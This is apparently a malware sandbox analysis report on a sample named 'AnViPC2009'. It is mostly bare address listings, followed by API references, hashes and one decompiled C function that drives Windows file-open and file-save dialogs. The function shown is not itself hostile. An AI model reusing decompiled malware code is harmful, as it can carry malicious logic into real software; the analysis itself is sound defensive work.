                                                                                                                                                      0x0040c0ad
                                                                                                                                                      0x0040c0b6
                                                                                                                                                      0x0040c0bc
                                                                                                                                                      0x0040c0c1
                                                                                                                                                      0x0040c0c3
                                                                                                                                                      0x0040c22f
                                                                                                                                                      0x0040c235
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c0c9
                                                                                                                                                      0x0040c0c9
                                                                                                                                                      0x0040c0ce
                                                                                                                                                      0x0040c0ce
                                                                                                                                                      0x0040c0d7
                                                                                                                                                      0x0040c0dd
                                                                                                                                                      0x0040c0e4
                                                                                                                                                      0x0040c194
                                                                                                                                                      0x0040c19b
                                                                                                                                                      0x0040c19d
                                                                                                                                                      0x0040c1a0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c1a2
                                                                                                                                                      0x0040c1a9
                                                                                                                                                      0x0040c1af
                                                                                                                                                      0x0040c1b1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c1b3
                                                                                                                                                      0x0040c1b3
                                                                                                                                                      0x0040c1b6
                                                                                                                                                      0x0040c1b7
                                                                                                                                                      0x0040c1bf
                                                                                                                                                      0x0040c1ce
                                                                                                                                                      0x0040c1d0
                                                                                                                                                      0x0040c1da
                                                                                                                                                      0x0040c1dc
                                                                                                                                                      0x0040c1df
                                                                                                                                                      0x0040c1b9
                                                                                                                                                      0x0040c1b9
                                                                                                                                                      0x0040c1b9
                                                                                                                                                      0x0040c1bc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c1e1
                                                                                                                                                      0x0040c1ef
                                                                                                                                                      0x0040c1f5
                                                                                                                                                      0x0040c1f7
                                                                                                                                                      0x0040c1f9
                                                                                                                                                      0x0040c1fe
                                                                                                                                                      0x0040c200
                                                                                                                                                      0x0040c20d
                                                                                                                                                      0x0040c20d
                                                                                                                                                      0x0040c200
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c1f7
                                                                                                                                                      0x0040c1df
                                                                                                                                                      0x0040c1b1
                                                                                                                                                      0x0040c0ea
                                                                                                                                                      0x0040c0ef
                                                                                                                                                      0x0040c0f2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c0f8
                                                                                                                                                      0x0040c106
                                                                                                                                                      0x0040c112
                                                                                                                                                      0x0040c11e
                                                                                                                                                      0x0040c123
                                                                                                                                                      0x0040c126
                                                                                                                                                      0x0040c129
                                                                                                                                                      0x0040c13c
                                                                                                                                                      0x0040c145
                                                                                                                                                      0x0040c14a
                                                                                                                                                      0x0040c14c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c152
                                                                                                                                                      0x0040c160
                                                                                                                                                      0x0040c16e
                                                                                                                                                      0x0040c173
                                                                                                                                                      0x0040c175
                                                                                                                                                      0x0040c176
                                                                                                                                                      0x0040c180
                                                                                                                                                      0x0040c187
                                                                                                                                                      0x0040c18e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c18e
                                                                                                                                                      0x0040c12b
                                                                                                                                                      0x0040c132
                                                                                                                                                      0x0040c137
                                                                                                                                                      0x0040c13a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c213
                                                                                                                                                      0x0040c213
                                                                                                                                                      0x0040c21c
                                                                                                                                                      0x0040c222
                                                                                                                                                      0x0040c227
                                                                                                                                                      0x0040c227
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c0ce
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c23f
                                                                                                                                                      0x0040c23f
                                                                                                                                                      0x0040c243
                                                                                                                                                      0x0040c262
                                                                                                                                                      0x0040c266
                                                                                                                                                      0x0040c270
                                                                                                                                                      0x0040c278
                                                                                                                                                      0x0040c268
                                                                                                                                                      0x0040c268
                                                                                                                                                      0x0040c268
                                                                                                                                                      0x0040c27a
                                                                                                                                                      0x0040c27c
                                                                                                                                                      0x0040c28d
                                                                                                                                                      0x0040c27e
                                                                                                                                                      0x0040c27e
                                                                                                                                                      0x0040c27e
                                                                                                                                                      0x0040c295
                                                                                                                                                      0x0040c2a0
                                                                                                                                                      0x0040c2a5
                                                                                                                                                      0x0040c2aa
                                                                                                                                                      0x0040c2ac
                                                                                                                                                      0x0040c2ae
                                                                                                                                                      0x0040c2ae
                                                                                                                                                      0x0040c2b3
                                                                                                                                                      0x0040c2b8
                                                                                                                                                      0x0040c2bc
                                                                                                                                                      0x0040c2c3
                                                                                                                                                      0x0040c2c3
                                                                                                                                                      0x0040c2bc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c2cd
                                                                                                                                                      0x0040c2cd
                                                                                                                                                      0x0040c2d1
                                                                                                                                                      0x0040c2e1
                                                                                                                                                      0x0040c2e1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c2ec
                                                                                                                                                      0x0040c2ec
                                                                                                                                                      0x0040c2f0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c2f6
                                                                                                                                                      0x0040c2f6
                                                                                                                                                      0x0040c2fd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c303
                                                                                                                                                      0x0040c303
                                                                                                                                                      0x0040c30a
                                                                                                                                                      0x0040c310
                                                                                                                                                      0x0040c317
                                                                                                                                                      0x0040c319
                                                                                                                                                      0x0040c319
                                                                                                                                                      0x0040c320
                                                                                                                                                      0x0040c325
                                                                                                                                                      0x0040c32a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c330
                                                                                                                                                      0x0040c330
                                                                                                                                                      0x0040c330
                                                                                                                                                      0x0040c332
                                                                                                                                                      0x0040c334
                                                                                                                                                      0x0040c3ea
                                                                                                                                                      0x0040c3ea
                                                                                                                                                      0x0040c3ec
                                                                                                                                                      0x0040c350
                                                                                                                                                      0x0040c358
                                                                                                                                                      0x0040c35d
                                                                                                                                                      0x0040c35f
                                                                                                                                                      0x0040c366
                                                                                                                                                      0x0040c36b
                                                                                                                                                      0x0040c36d
                                                                                                                                                      0x0040c36f
                                                                                                                                                      0x0040c373
                                                                                                                                                      0x0040c375
                                                                                                                                                      0x0040c375
                                                                                                                                                      0x0040c373
                                                                                                                                                      0x0040c380
                                                                                                                                                      0x0040c38c
                                                                                                                                                      0x0040c39c
                                                                                                                                                      0x0040c3a6
                                                                                                                                                      0x0040c3b5
                                                                                                                                                      0x0040c3bb
                                                                                                                                                      0x0040c3c3
                                                                                                                                                      0x0040c3c8
                                                                                                                                                      0x0040c3ca
                                                                                                                                                      0x0040c3df
                                                                                                                                                      0x0040c3df
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c3ca
                                                                                                                                                      0x0040c3f2
                                                                                                                                                      0x0040c3f2
                                                                                                                                                      0x0040c3f4
                                                                                                                                                      0x0040c400
                                                                                                                                                      0x0040c400
                                                                                                                                                      0x0040c412
                                                                                                                                                      0x0040c418
                                                                                                                                                      0x0040c41a
                                                                                                                                                      0x0040c420
                                                                                                                                                      0x0040c427
                                                                                                                                                      0x0040c435
                                                                                                                                                      0x0040c43c
                                                                                                                                                      0x0040c445
                                                                                                                                                      0x0040c445
                                                                                                                                                      0x0040c44b
                                                                                                                                                      0x0040c452
                                                                                                                                                      0x0040c454
                                                                                                                                                      0x0040c45b
                                                                                                                                                      0x0040c460
                                                                                                                                                      0x0040c466
                                                                                                                                                      0x0040c467
                                                                                                                                                      0x0040c46b
                                                                                                                                                      0x0040c479
                                                                                                                                                      0x0040c479
                                                                                                                                                      0x0040c46b
                                                                                                                                                      0x0040c484
                                                                                                                                                      0x0040c486
                                                                                                                                                      0x0040c492
                                                                                                                                                      0x0040c494
                                                                                                                                                      0x0040c49a
                                                                                                                                                      0x0040c4a8
                                                                                                                                                      0x0040c4a8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c49a
                                                                                                                                                      0x0040c3f6
                                                                                                                                                      0x0040c3f6
                                                                                                                                                      0x0040c3fa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c3fa
                                                                                                                                                      0x0040c33a
                                                                                                                                                      0x0040c33a
                                                                                                                                                      0x0040c33e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c344
                                                                                                                                                      0x0040c344
                                                                                                                                                      0x0040c347
                                                                                                                                                      0x0040c34a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c34a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c4b2
                                                                                                                                                      0x0040c4b2
                                                                                                                                                      0x0040c4b3
                                                                                                                                                      0x0040c4b8
                                                                                                                                                      0x0040c4ba
                                                                                                                                                      0x0040c4bd
                                                                                                                                                      0x0040c4bd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c4f3
                                                                                                                                                      0x0040c4f3
                                                                                                                                                      0x0040c4fa
                                                                                                                                                      0x0040c4fa
                                                                                                                                                      0x0040c4fd
                                                                                                                                                      0x0040c52a
                                                                                                                                                      0x0040c52a
                                                                                                                                                      0x0040c531
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c531
                                                                                                                                                      0x0040c4ff
                                                                                                                                                      0x0040c4ff
                                                                                                                                                      0x0040c4ff
                                                                                                                                                      0x0040c502
                                                                                                                                                      0x0040c517
                                                                                                                                                      0x0040c517
                                                                                                                                                      0x0040c51e
                                                                                                                                                      0x0040c51e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c51e
                                                                                                                                                      0x0040c504
                                                                                                                                                      0x0040c504
                                                                                                                                                      0x0040c504
                                                                                                                                                      0x0040c505
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c507
                                                                                                                                                      0x0040c507
                                                                                                                                                      0x0040c507
                                                                                                                                                      0x0040c508
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c50e
                                                                                                                                                      0x0040c50e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c50e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c57f
                                                                                                                                                      0x0040c57f
                                                                                                                                                      0x0040c583
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c589
                                                                                                                                                      0x0040c589
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c727
                                                                                                                                                      0x0040c727
                                                                                                                                                      0x0040c72b
                                                                                                                                                      0x0040c72d
                                                                                                                                                      0x0040c734
                                                                                                                                                      0x0040c740
                                                                                                                                                      0x0040c740
                                                                                                                                                      0x0040c746
                                                                                                                                                      0x0040c74e
                                                                                                                                                      0x0040c74e
                                                                                                                                                      0x0040c753
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c75f
                                                                                                                                                      0x0040c75f
                                                                                                                                                      0x0040c763
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c769
                                                                                                                                                      0x0040c769
                                                                                                                                                      0x0040c58b
                                                                                                                                                      0x0040c591
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c770
                                                                                                                                                      0x0040c770
                                                                                                                                                      0x0040c774
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c77a
                                                                                                                                                      0x0040c77a
                                                                                                                                                      0x0040c782
                                                                                                                                                      0x0040c787
                                                                                                                                                      0x0040c787
                                                                                                                                                      0x0040c78a
                                                                                                                                                      0x0040c7af
                                                                                                                                                      0x0040c78c
                                                                                                                                                      0x0040c78c
                                                                                                                                                      0x0040c78c
                                                                                                                                                      0x0040c78f
                                                                                                                                                      0x0040c7a6
                                                                                                                                                      0x0040c791
                                                                                                                                                      0x0040c791
                                                                                                                                                      0x0040c791
                                                                                                                                                      0x0040c792
                                                                                                                                                      0x0040c79d
                                                                                                                                                      0x0040c794
                                                                                                                                                      0x0040c794
                                                                                                                                                      0x0040c794
                                                                                                                                                      0x0040c792
                                                                                                                                                      0x0040c78f
                                                                                                                                                      0x0040c7bd
                                                                                                                                                      0x0040c7c4
                                                                                                                                                      0x0040c7cb
                                                                                                                                                      0x0040c7d2
                                                                                                                                                      0x0040c7d7
                                                                                                                                                      0x0040c7de
                                                                                                                                                      0x0040c81f
                                                                                                                                                      0x0040c828
                                                                                                                                                      0x0040c82d
                                                                                                                                                      0x0040c82f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c831
                                                                                                                                                      0x0040c831
                                                                                                                                                      0x0040c833
                                                                                                                                                      0x0040c83a
                                                                                                                                                      0x0040c840
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c842
                                                                                                                                                      0x0040c842
                                                                                                                                                      0x0040c842
                                                                                                                                                      0x0040c844
                                                                                                                                                      0x0040c847
                                                                                                                                                      0x0040c84e
                                                                                                                                                      0x0040c850
                                                                                                                                                      0x0040c857
                                                                                                                                                      0x0040c85a
                                                                                                                                                      0x0040c85f
                                                                                                                                                      0x0040c861
                                                                                                                                                      0x0040c893
                                                                                                                                                      0x0040c893
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c893
                                                                                                                                                      0x0040c863
                                                                                                                                                      0x0040c863
                                                                                                                                                      0x0040c865
                                                                                                                                                      0x0040c868
                                                                                                                                                      0x0040c87c
                                                                                                                                                      0x0040c87c
                                                                                                                                                      0x0040c87c
                                                                                                                                                      0x0040c87d
                                                                                                                                                      0x0040c87d
                                                                                                                                                      0x0040c882
                                                                                                                                                      0x0040c883
                                                                                                                                                      0x0040c889
                                                                                                                                                      0x0040c889
                                                                                                                                                      0x0040c88a
                                                                                                                                                      0x0040c88f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c88f
                                                                                                                                                      0x0040c86a
                                                                                                                                                      0x0040c86a
                                                                                                                                                      0x0040c86a
                                                                                                                                                      0x0040c86d
                                                                                                                                                      0x0040c86e
                                                                                                                                                      0x0040c874
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c874
                                                                                                                                                      0x0040c849
                                                                                                                                                      0x0040c849
                                                                                                                                                      0x0040c84c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c895
                                                                                                                                                      0x0040c895
                                                                                                                                                      0x0040c896
                                                                                                                                                      0x0040c896
                                                                                                                                                      0x0040c89b
                                                                                                                                                      0x0040c89d
                                                                                                                                                      0x0040c89f
                                                                                                                                                      0x0040c89f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c7e0
                                                                                                                                                      0x0040c7e0
                                                                                                                                                      0x0040c7e7
                                                                                                                                                      0x0040c7f5
                                                                                                                                                      0x0040c7fc
                                                                                                                                                      0x0040c801
                                                                                                                                                      0x0040c803
                                                                                                                                                      0x0040c809
                                                                                                                                                      0x0040c815
                                                                                                                                                      0x0040c815
                                                                                                                                                      0x0040c8a2
                                                                                                                                                      0x0040c8a2
                                                                                                                                                      0x0040c8a9
                                                                                                                                                      0x0040c8b2
                                                                                                                                                      0x0040c8b9
                                                                                                                                                      0x0040c8b9
                                                                                                                                                      0x0040c8c5
                                                                                                                                                      0x0040c8d4
                                                                                                                                                      0x0040c8db
                                                                                                                                                      0x0040c8e7
                                                                                                                                                      0x0040c8ec
                                                                                                                                                      0x0040c8f3
                                                                                                                                                      0x0040c8fc
                                                                                                                                                      0x0040c908
                                                                                                                                                      0x0040c90f
                                                                                                                                                      0x0040c90f
                                                                                                                                                      0x0040c91b
                                                                                                                                                      0x0040c922
                                                                                                                                                      0x0040c927
                                                                                                                                                      0x0040c92e
                                                                                                                                                      0x0040c934
                                                                                                                                                      0x0040c936
                                                                                                                                                      0x0040c936
                                                                                                                                                      0x0040c94a
                                                                                                                                                      0x0040c94f
                                                                                                                                                      0x0040c956
                                                                                                                                                      0x0040c95b
                                                                                                                                                      0x0040c95d
                                                                                                                                                      0x0040c96e
                                                                                                                                                      0x0040c97a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c95f
                                                                                                                                                      0x0040c95f
                                                                                                                                                      0x0040c965
                                                                                                                                                      0x0040c96a
                                                                                                                                                      0x0040c96c
                                                                                                                                                      0x0040c97f
                                                                                                                                                      0x0040c98a
                                                                                                                                                      0x0040c996
                                                                                                                                                      0x0040c998
                                                                                                                                                      0x0040c99a
                                                                                                                                                      0x0040c9a3
                                                                                                                                                      0x0040c9aa
                                                                                                                                                      0x0040c9ac
                                                                                                                                                      0x0040c9ae
                                                                                                                                                      0x0040c9b7
                                                                                                                                                      0x0040c9be
                                                                                                                                                      0x0040c9c0
                                                                                                                                                      0x0040c9c2
                                                                                                                                                      0x0040c9cb
                                                                                                                                                      0x0040c9d9
                                                                                                                                                      0x0040c9de
                                                                                                                                                      0x0040c9e5
                                                                                                                                                      0x0040c9e9
                                                                                                                                                      0x0040c9f7
                                                                                                                                                      0x0040c9f7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c9e5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c96c
                                                                                                                                                      0x0040c95d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c9ff
                                                                                                                                                      0x0040c9ff
                                                                                                                                                      0x0040ca03
                                                                                                                                                      0x0040ca05
                                                                                                                                                      0x0040ca05
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c53d
                                                                                                                                                      0x0040c53d
                                                                                                                                                      0x0040c545
                                                                                                                                                      0x0040c54a
                                                                                                                                                      0x0040c54d
                                                                                                                                                      0x0040c573
                                                                                                                                                      0x0040c54f
                                                                                                                                                      0x0040c54f
                                                                                                                                                      0x0040c552
                                                                                                                                                      0x0040c567
                                                                                                                                                      0x0040c554
                                                                                                                                                      0x0040c554
                                                                                                                                                      0x0040c55b
                                                                                                                                                      0x0040c55b
                                                                                                                                                      0x0040c552
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bfe1
                                                                                                                                                      0x0040bfe5
                                                                                                                                                      0x0040bfea
                                                                                                                                                      0x0040bff1
                                                                                                                                                      0x0040bff1
                                                                                                                                                      0x0040bff4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bff6
                                                                                                                                                      0x0040bff6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bff6
                                                                                                                                                      0x0040bff4
                                                                                                                                                      0x0040ca3e
                                                                                                                                                      0x0040ca3e
                                                                                                                                                      0x0040c61d
                                                                                                                                                      0x0040c624
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c62a
                                                                                                                                                      0x0040c62c
                                                                                                                                                      0x0040c633
                                                                                                                                                      0x0040c63a
                                                                                                                                                      0x0040c641
                                                                                                                                                      0x0040c681
                                                                                                                                                      0x0040c688
                                                                                                                                                      0x0040c691
                                                                                                                                                      0x0040c69d
                                                                                                                                                      0x0040c6ab
                                                                                                                                                      0x0040c6ab
                                                                                                                                                      0x0040c6b7
                                                                                                                                                      0x0040c6c5
                                                                                                                                                      0x0040c6cf
                                                                                                                                                      0x0040c6d6
                                                                                                                                                      0x0040c6df
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c6e5
                                                                                                                                                      0x0040c6e5
                                                                                                                                                      0x0040c6e7
                                                                                                                                                      0x0040c6ec
                                                                                                                                                      0x0040c6f3
                                                                                                                                                      0x0040c6f8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c6f8
                                                                                                                                                      0x0040c6df
                                                                                                                                                      0x0040c643
                                                                                                                                                      0x0040c643
                                                                                                                                                      0x0040c64c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c64e
                                                                                                                                                      0x0040c64e
                                                                                                                                                      0x0040c656
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c658
                                                                                                                                                      0x0040c658
                                                                                                                                                      0x0040c661
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c663
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c663
                                                                                                                                                      0x0040c665
                                                                                                                                                      0x0040c66d
                                                                                                                                                      0x0040c674
                                                                                                                                                      0x0040c679
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c6fe
                                                                                                                                                      0x0040c702
                                                                                                                                                      0x0040c70f
                                                                                                                                                      0x0040c711
                                                                                                                                                      0x0040c711
                                                                                                                                                      0x0040c71b
                                                                                                                                                      0x0040c71b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c702

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DialogItemMessagePathTempText
                                                                                                                                                      • String ID: %s%s%d$@
                                                                                                                                                      • API String ID: 2494799851-3206671281
                                                                                                                                                      • Opcode ID: 77b2389bf64523cd01ad51e7ae423f08b149592db4e573d1bff172660f1ca29d
                                                                                                                                                      • Instruction ID: 48a93aca2e2bf8a60cc4dabb81976c404b686b8a4596ad806797bddee5965465
                                                                                                                                                      • Opcode Fuzzy Hash: 77b2389bf64523cd01ad51e7ae423f08b149592db4e573d1bff172660f1ca29d
                                                                                                                                                      • Instruction Fuzzy Hash: E441427180125CEEEB21EBA0CD88FDE77ACAB04308F0085B6E515E2181D7799B99CF55
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                      			E00402810(intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, char _a20) {
                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				CHAR* _v36;
                                                                                                                                                      				long _v48;
                                                                                                                                                      				char* _v52;
                                                                                                                                                      				char* _v68;
                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                      				char _v80;
                                                                                                                                                      				char _v592;
                                                                                                                                                      				char _v1616;
                                                                                                                                                      				void* _t39;
                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                      				signed int _t48;
                                                                                                                                                      				void* _t61;
                                                                                                                                                      				signed int _t63;
                                                                                                                                                      				void* _t65;
                                                                                                                                                      				char _t66;
                                                                                                                                                      				char* _t67;
                                                                                                                                                      				void* _t68;
                                                                                                                                                      				void* _t69;
                                                                                                                                                      				signed int _t76;
                                                                                                                                                      
                                                                                                                                                      				_t64 =  &_v592;
                                                                                                                                                      				if(_a16 != 0) {
                                                                                                                                                      					E0040A450( &_v592, _a16);
                                                                                                                                                      					_t68 = _t69 + E0040A35D(_t61,  &_v592) - 0x24b;
                                                                                                                                                      					E0040A450(_t68, _a16);
                                                                                                                                                      					_t64 = _t68 + E0040A35D(_t61, _t68) + 1;
                                                                                                                                                      				}
                                                                                                                                                      				E0040A450(_t64, E004098D0(0x85));
                                                                                                                                                      				_t65 = _t64 + E0040A35D(_t61, _t64) + 1;
                                                                                                                                                      				E0040A450(_t65, 0x4122e4);
                                                                                                                                                      				_t39 = E0040A35D(_t61, _t65);
                                                                                                                                                      				 *((char*)(_t39 + _t65 + 1)) = 0;
                                                                                                                                                      				_t66 = 0x4c;
                                                                                                                                                      				E0040A262(_t61,  &_v80, 0, _t66);
                                                                                                                                                      				_v76 = _a4;
                                                                                                                                                      				_t43 =  *0x414c78; // 0x400000
                                                                                                                                                      				_v72 = _t43;
                                                                                                                                                      				_v80 = _t66;
                                                                                                                                                      				_t67 = _a12;
                                                                                                                                                      				_v68 =  &_v592;
                                                                                                                                                      				_v52 = _t67;
                                                                                                                                                      				_v48 = 0x400;
                                                                                                                                                      				_v32 = _a8;
                                                                                                                                                      				if(E004073B4(_t67) == _t67) {
                                                                                                                                                      					GetCurrentDirectoryA(0x400,  &_v1616);
                                                                                                                                                      					_v36 =  &_v1616;
                                                                                                                                                      				}
                                                                                                                                                      				_v28 = 0x1080c;
                                                                                                                                                      				_push( &_v80);
                                                                                                                                                      				if(_a20 == 0) {
                                                                                                                                                      					_t48 = GetOpenFileNameA();
                                                                                                                                                      				} else {
                                                                                                                                                      					_t48 = GetSaveFileNameA();
                                                                                                                                                      				}
                                                                                                                                                      				_t63 = _t48;
                                                                                                                                                      				if(_t63 == 0) {
                                                                                                                                                      					_t48 = CommDlgExtendedError();
                                                                                                                                                      					if(_t48 == 0x3002) {
                                                                                                                                                      						 *_t67 = 0;
                                                                                                                                                      						_push( &_v80);
                                                                                                                                                      						if(_a20 == 0) {
                                                                                                                                                      							_t48 = GetOpenFileNameA();
                                                                                                                                                      						} else {
                                                                                                                                                      							_t48 = GetSaveFileNameA();
                                                                                                                                                      						}
                                                                                                                                                      						_t63 = _t48;
                                                                                                                                                      					}
                                                                                                                                                      					_t76 = _t63;
                                                                                                                                                      				}
                                                                                                                                                      				return _t48 & 0xffffff00 | _t76 != 0x00000000;
                                                                                                                                                      			}

























                                                                                                                                                      0x00402820
                                                                                                                                                      0x00402826
                                                                                                                                                      0x0040282e
                                                                                                                                                      0x0040283e
                                                                                                                                                      0x00402846
                                                                                                                                                      0x00402851
                                                                                                                                                      0x00402851
                                                                                                                                                      0x00402861
                                                                                                                                                      0x0040286c
                                                                                                                                                      0x00402876
                                                                                                                                                      0x0040287c
                                                                                                                                                      0x00402883
                                                                                                                                                      0x00402888
                                                                                                                                                      0x00402890
                                                                                                                                                      0x00402898
                                                                                                                                                      0x0040289b
                                                                                                                                                      0x004028a0
                                                                                                                                                      0x004028a9
                                                                                                                                                      0x004028ac
                                                                                                                                                      0x004028af
                                                                                                                                                      0x004028bb
                                                                                                                                                      0x004028be
                                                                                                                                                      0x004028c1
                                                                                                                                                      0x004028cb
                                                                                                                                                      0x004028d5
                                                                                                                                                      0x004028e1
                                                                                                                                                      0x004028e1
                                                                                                                                                      0x004028f1
                                                                                                                                                      0x004028f8
                                                                                                                                                      0x004028f9
                                                                                                                                                      0x00402903
                                                                                                                                                      0x004028fb
                                                                                                                                                      0x004028fb
                                                                                                                                                      0x004028fb
                                                                                                                                                      0x00402905
                                                                                                                                                      0x00402909
                                                                                                                                                      0x0040290b
                                                                                                                                                      0x00402916
                                                                                                                                                      0x0040291f
                                                                                                                                                      0x00402922
                                                                                                                                                      0x00402923
                                                                                                                                                      0x0040292d
                                                                                                                                                      0x00402925
                                                                                                                                                      0x00402925
                                                                                                                                                      0x00402925
                                                                                                                                                      0x0040292f
                                                                                                                                                      0x0040292f
                                                                                                                                                      0x00402931
                                                                                                                                                      0x00402931
                                                                                                                                                      0x0040293a

                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000400,?,?,?,00000000,0000004C,?,?,004122E4,?,?,00000000,00000085,?,?), ref: 004028D5
                                                                                                                                                      • GetSaveFileNameA.COMDLG32(?,?,?,00000000,0000004C,?,?,004122E4,?,?,00000000,00000085,?,?), ref: 004028FB
                                                                                                                                                      • GetOpenFileNameA.COMDLG32(?,?,?,00000000,0000004C,?,?,004122E4,?,?,00000000,00000085,?,?), ref: 00402903
                                                                                                                                                      • CommDlgExtendedError.COMDLG32 ref: 0040290B
                                                                                                                                                      • GetSaveFileNameA.COMDLG32(?), ref: 00402925
                                                                                                                                                      • GetOpenFileNameA.COMDLG32(?), ref: 0040292D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
